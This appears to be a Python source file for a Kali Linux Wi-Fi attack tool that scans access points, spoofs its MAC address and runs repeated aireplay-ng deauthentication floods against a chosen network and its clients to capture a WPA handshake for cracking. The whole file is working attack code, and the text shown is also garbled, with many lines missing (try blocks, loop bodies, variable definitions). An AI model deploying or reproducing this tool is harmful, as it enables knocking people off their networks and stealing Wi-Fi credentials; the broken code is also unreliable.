353 lines
10 KiB
Executable File
353 lines
10 KiB
Executable File
import xml.etree.ElementTree as ET
import prettytable
import subprocess
import threading
import argparse
import time
import xml
import sys
import os
import re
# default values
gaps = None
TDIR = '/tmp/wcrack'
TARGS = None
'handshake': False
def she(c,debug=False):
return subprocess.check_output(c,shell=True).decode('utf8','ignore').strip()
except Exception as e:
if debug:
return None
def main():
# yes, we use a global variable
# to get the program arguments
global TARGS
parser = argparse.ArgumentParser(description='The faster WPA Handshake capturer on Kali')
parser.add_argument('--dry-run', action='store_true', help="Don't do deauth attacks, just show how it would run")
parser.add_argument('-m', '--random-mac', action='store_true', help="Randomize your MAC address at start (keeping vendor bits)")
parser.add_argument('-fa', '--force-attack', action='store_true', help="Deauths the AP before looking for connected clients")
parser.add_argument('-f', '--force', action='store_true', help='Continue on program exceptions that might ocurr, but are not critical')
parser.add_argument('-ex', '--exclude-conf', action='store_true', help="Exclude ESSIDs by regex reading /etc/spidshake/exclude.conf")
reqgroup = parser.add_argument_group('required arguments')
reqgroup.add_argument('-i','--interface', type=str, required=True, help="Interface on monitor mode to be used")
parser.add_argument('-sm','--show-max', default=12, type=int, help="Maximum Access Points to display on screen")
TARGS = parser.parse_args(sys.argv[1:])
# make the tmp dir
os.system('mkdir -p {}'.format(TDIR))
# the netxml file to read
apdata = []
nxmlfile = '{}/airodump-01.kismet.netxml'.format(TDIR)
# start dumping ap data
def render_access_points(apdata):
if len(apdata) > 0:
tb = prettytable.PrettyTable(['CH','BSSID','PW','C','#','ESSID'])
i = 0
for ap in apdata:
tb.add_row([ap['channel'], ap['bssid'][-8:], \
ap['signal'], len(ap['clients']), i, ap['essid']])
i += 1
# show aps indefinetly
li = 0
while True:
# get access point data
apdata = get_ap_data(nxmlfile)
li += 1
except KeyboardInterrupt:
# if no access points, we quit
if len(apdata) == 0:
return 0
# select the desired AP
select = 0
select = int(input('[[ Select AP index ]]: ').strip())
except ValueError:
# if index is correct, start attacking
if len(apdata) > 0 and select >= 0 and select < len(apdata):
ap_attack(nxmlfile, apdata, select)
def randomize_mac():
if TARGS.random_mac:
os.system('ifconfig {} down'.format(TARGS.interface))
# fully random macs don't usually work on deauthing, they are ignored
# so we set a fully random mac, but leaving the vendor bits unchanged
os.system('macchanger -r -e {} 2>&1 | tail -n1'.format(TARGS.interface))
os.system('ifconfig {} up'.format(TARGS.interface))
# use airodump-ng to capture all APs in
# netxml format (2.4GHZ support only, yet)
def airodump_all():
# yes, we kill all airodump-ng
os.system('pkill -9 airodump-ng')
os.system('rm {}/airodump* 2>/dev/null'.format(TDIR))
os.system('airodump-ng {} -a -M -w {}/airodump --write-interval 1 --band a --output-format netxml --channel 1-14 -K 1 > /dev/null 2>&1 &'\
.format(TARGS.interface, TDIR))
# use airodump-ng with bssid and channel config
# to get clients and attack easier and faster
# pcap format added to check handshakes
def airodump_bssid(bssid,channel):
# yes, we kill all airodump-ng
os.system('pkill -9 airodump-ng')
os.system('rm {}/airodump* 2>/dev/null'.format(TDIR))
airodump-ng {} --bssid {} -a -M -w {}/airodump --write-interval 1 --band a --cswitch 2 --output-format pcap,netxml --channel {} -K 1 > /dev/null 2>&1 &
""".format(TARGS.interface, bssid, TDIR, channel))
# filter ap by bssid in aps
def ap_get_by_bssid(aps, bssid):
for ap in aps:
if ap['bssid'] == bssid:
return ap
return None
# do the access point attack
def ap_attack(f, aps, index):
global thstop
global atls
hashake = False
thstop = False
thattack = None
atls = []
sap = aps[index]
# start capturing bssid traffic with specific channel
airodump_bssid(sap['bssid'], sap['channel'])
while True:
# ap index will certainly change in our implementation
# we need to search the new given aps to match bssid
ap = aps[index]
if ap['bssid'] != sap['bssid']:
ap = ap_get_by_bssid(aps, sap['bssid'])
except IndexError:
ap = ap_get_by_bssid(aps, sap['bssid'])
if ap is None:
print('FATAL: cannot retrieve AP data!')
return 1
# print the ap details and
# the connnected clients
if (TARGS.force_attack and thattack is None) or (len(ap['clients']) > 0 and thattack is None):
thattack = threading.Thread(target=ap_attack_do_clients)
print('{}; channel: {}'.format(ap['essid'], ap['channel']))
print('{}\t{}\t{}'.format(ap['bssid'], ap['signal'], ap['vendor']))
for cli in ap['clients']:
print('--¬ {}\t{}\t{}'.format(cli['mac'], cli['signal'], cli['vendor']))
# print attack info lines
for l in atls:
# check for handshake
if TVARS['handshake']:
hsfile = 'hs/handshake_{}.cap'.format(sap['essid'])
os.system('mkdir -p hs/')
os.system("cp {}/airodump-01.cap '{}'".format(TDIR, hsfile))
input('## handshake: YES / saved on {}'.format(hsfile))
TVARS['handshake'] = False
thstop = True
return 0
# sleep and re-obtain, show handshake status
print('## handshake: {}'.format('NO' if not TVARS['handshake'] else 'YES'))
aps = get_ap_data(f)
global gaps
gaps = aps
# don't know why i did this, but works?
while len(aps) == 0:
aps = get_ap_data(f)
except KeyboardInterrupt:
thstop = True
print('INFO: returing to ap listing')
# thread to attack clients and ap
# while showing them in the main thread
def ap_attack_do_clients():
global thstop
global gaps
global atls
atls = []
hashake = False
while True:
if not gaps is None and not len(gaps) == 0:
if thstop:
return 0
# explanation:
# attack n times, each n seconds
# @ An array of values
times = [
# do it all, baby
for ti in times:
gap = None
if len(gaps) == 1:
gap = gaps[0]
if gap is None:
print('FATAL: no access point or clients to attack')
return 1
randomize_mac(); time.sleep(0.5)
execrt('aireplay-ng --ignore-negative-one -0 {} -a {} {} 2>&1 &'.format( ti[0], gap['bssid'], TARGS.interface ))
atls.append('== deauth {} broadcast => {}'.format(ti[0], gap['bssid']))
for cl in gap['clients']:
if cl['signal'] < 0:
execrt('aireplay-ng --ignore-negative-one -0 {} -a {} -c {} --deauth-rc=2 {} 2>&1 &'.format(\
ti[0], gap['bssid'], cl['mac'], TARGS.interface ))
atls.append('== deauth {} client {} {}'.format(ti[0], cl['mac'], cl['vendor']))
atls.append('== deauth client skip {} {}'.format(cl['mac'], cl['vendor']))
i = 0
while i < ti[1]:
if ap_check_has_handshake():
TVARS['handshake'] = True
return 2
if thstop:
return 0
i += 1
atls.append('FATAL: Attack did not succeed')
def execrt(cmd):
if not TARGS.dry_run:
return 'X: {}'.format(cmd)
def ap_check_has_handshake():
out = subprocess.check_output(\
"aircrack-ng {}/airodump-01.cap 2>/dev/null | grep -o -P '\d+(?=\shandshake)'".format(TDIR), shell=True)\
return int(out) > 0
except FileNotFoundError:
return False
except subprocess.CalledProcessError:
return False
# get all access point data needed (including associated clients)
def get_ap_data(f):
c = None
c = open(f,'r').read()
# sanitize xml (improper essids...)
c = re.sub(r'(?<=\&\#[^\s])\s+(?=[^\s]+;)','',c)
c = re.sub(r'\&\#[^;]+;','',c)
root = ET.fromstring(c)
except FileNotFoundError as e:
return []
except xml.etree.ElementTree.ParseError as e2:
if TARGS.force:
return []
if not str(e2).startswith('no element found'):
return []
js = []
# iterate all network access points
exclude = []
if TARGS.exclude_conf:
with open('/etc/spidshake/exclude.conf','r') as r:
exclude = r.read().strip().splitlines()
except FileNotFoundError:
exclude = []
def is_excluded(essid, exls):
for reg in exls:
if re.match(reg, essid):
return True
return False
for net in root.findall('wireless-network'):
if net.find('SSID'):
item = {
'essid': net.find('SSID').find('essid').text,
'bssid': net.find('BSSID').text,
'vendor': net.find('manuf').text,
'channel': int(net.find('channel').text),
'beacons': int(net.find('SSID').find('packets').text),
'enctypes': [it.text for it in net.find('SSID').findall('encryption')],
'signal': int(net.find('snr-info').find('last_signal_dbm').text),
'clients': [],
if len(item['enctypes']) == 1 and item['enctypes'][0] == 'None':
for cli in net.findall('wireless-client'):
client = {
'mac': cli.find('client-mac').text,
'vendor': cli.find('client-manuf').text,
'channel': int(cli.find('channel').text),
'signal': int(cli.find('snr-info').find('last_signal_dbm').text),
item['clients'] = sorted(item['clients'], key=lambda x: x['signal'], reverse=True)
if not item['essid'] is None:
if not TARGS.exclude_conf or not is_excluded(item['essid'], exclude):
# order them by signal (dBm)
js = sorted(js, key=lambda x: x['signal'], reverse=True)
if len(js) > TARGS.show_max:
return js[:TARGS.show_max]
return js
if __name__ == '__main__':
os.system('pkill -9 airodump-ng')
except KeyboardInterrupt:
print('INFO: aborted')